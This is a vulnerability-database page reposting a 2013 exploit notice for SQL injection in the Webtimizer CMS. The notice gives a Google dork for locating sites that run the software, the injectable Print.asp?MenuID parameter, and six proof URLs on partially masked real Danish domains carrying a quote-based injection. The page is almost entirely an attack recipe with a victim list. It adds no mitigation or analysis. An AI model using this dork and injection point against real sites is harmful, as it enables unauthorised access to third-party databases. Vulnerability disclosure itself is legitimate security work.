Webtimizer Sql injection vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044508 漏洞类型
发布时间 2013-09-03 更新时间 2013-09-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013090031
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#********************************************************************************
# [+] Exploit Title : Webtimizer Sql injection vulnerability
#*********************************************************************
# [+] Software link : http://webtimiser.dk
#*****************************************************************
# [+] Exploit Author : Ashiyane Digital Security Team
#****************************************************
# [+] Tested on: Windows 7 , Linux
#*********************************
# [+] Google Dork : intext:"Powered by Webtimizer"
#***********************************************************
# [+] Date: 2013/09/01
#*********************
--------------------------------------------------------------------
# [+] Exploit :
#
# [+] Location : [Target]/Print.asp?MenuID=[Sql Injection]
#
#-------
# Proof:
#-------
#
# http://www.kuXservering.dk/Print.asp?MenuID=1'
#
# http://www.XXlor.dk/Print.asp?MenuID=1'
#
# http://www.XX.dk/Print.asp?MenuID=1'
#
# http://wwXXXn.dk/Print.asp?MenuID=1'
#
# http://www.frXXer.dk/Print.asp?MenuID=1'
#
# http://www.hXXXne.dk/Print.asp?MenuID=1'
#
#
######################
discovered by : ACC3SS
######################